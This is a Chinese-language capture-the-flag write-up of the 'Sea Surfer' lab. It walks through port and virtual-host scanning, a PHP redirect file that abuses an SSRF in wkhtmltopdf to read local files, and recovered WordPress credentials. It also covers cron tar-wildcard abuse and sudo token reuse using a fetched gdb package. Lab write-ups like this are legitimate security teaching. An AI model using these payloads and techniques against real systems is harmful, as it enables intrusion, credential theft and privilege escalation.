Sea Surfer
端口扫描
root@ip-10-10-145-227:~# nmap -sTCV -p- --min-rate 1000 10.10.20.171
Starting Nmap 7.60 ( https://nmap.org ) at 2023-11-05 02:54 GMT
Nmap scan report for ip-10-10-20-171.eu-west-1.compute.internal (10.10.20.171)
Host is up (0.0012s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 02:DF:38:87:AD:2B (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
80
root@ip-10-10-145-227:~# curl -I http://10.10.20.171/
HTTP/1.1 200 OK
.....
X-Backend-Server: seasurfer.thm
.....
root@ip-10-10-145-227:~# gobuster vhost -u http://seasurfer.thm/ -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://seasurfer.thm/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2023/11/05 03:06:56 Starting gobuster
===============================================================
Found: internal.seasurfer.thm (Status: 200) [Size: 3072]
查看主域进行一些扫描, 获取到一些内容:
root@ip-10-10-145-227:~# gobuster dir -u http://seasurfer.thm/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://seasurfer.thm/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt,html
[+] Timeout: 10s
===============================================================
2023/11/05 03:42:29 Starting gobuster
===============================================================
/news (Status: 301)
/index.php (Status: 301)
/contact (Status: 301)
...
/adminer : 数据库登陆界面
在上面我们获取到一个用户 kyle 同时发现这是一个 wordpress 站点, 目前来看除了登陆别无他发, 所以我开始转战子域, 我觉得这里应该是突破口, 再填写表单后, 我发现其给了我一个 PDF 查看其对应的工具, 经过查找发现存在 SSRF 漏洞 wkhtmltopdf SSRF | Exploit Notes
在本地搭建环境进行 SSRF 利用
root@ip-10-10-145-227:~/seasurfer# cat test.php
<?php header('location:file://'.$_REQUEST['x']); ?>
在 wp-config.php 中我们可以读取到对应的数据库配置文件从而获取到数据库的账号和密码, 对应的我们就可以获取到 wordpress 的管理员账号和密码 : kyle:jenny4ever 接下来就是老三套了, 不多说
后渗透
www-data
尝试获取一个reverse shell
www-data —> kyle
在网站中发现存在一个定时任务, 从其内容来看存在通配符利用, 我们可以利用此来完成攻击
(remote) www-data@seasurfer:/var/www/internal/maintenance$ cat backup.sh
#!/bin/bash
# Brandon complained about losing _one_ receipt when we had 5 minutes of downtime, set this to run every minute now >:D
# Still need to come up with a better backup system, perhaps a cloud provider?
cd /var/www/internal/invoices
tar -zcf /home/kyle/backups/invoices.tgz *
(remote) www-data@seasurfer:/var/www/internal/maintenance$ ls -al backup.sh
-rwxrwxr-x 1 kyle kyle 286 Apr 19 2022 backup.sh
kyle —> root
我发现用户 kyle 存在一个 root ��进程, 我们可以尝试利用此进行令牌重用
(remote) kyle@seasurfer:/home/kyle$ ps -ef
....
kyle 1122 1121 0 02:52 pts/0 00:00:00 bash -c sudo /root/admincheck; sleep infinity
...
下载对应的 gdb 工具并上传我们就可以获取到 root 的 Shell了
$ wget http://fi.archive.ubuntu.com/ubuntu/pool/main/g/gdb/gdb_9.1-0ubuntu1_amd64.deb
(remote) kyle@seasurfer:/tmp$ dpkg -x gdb_9.1-0ubuntu1_amd64.deb ~
(remote) kyle@seasurfer:/tmp$ export PATH=/home/kyle/usr/bin:$PATH
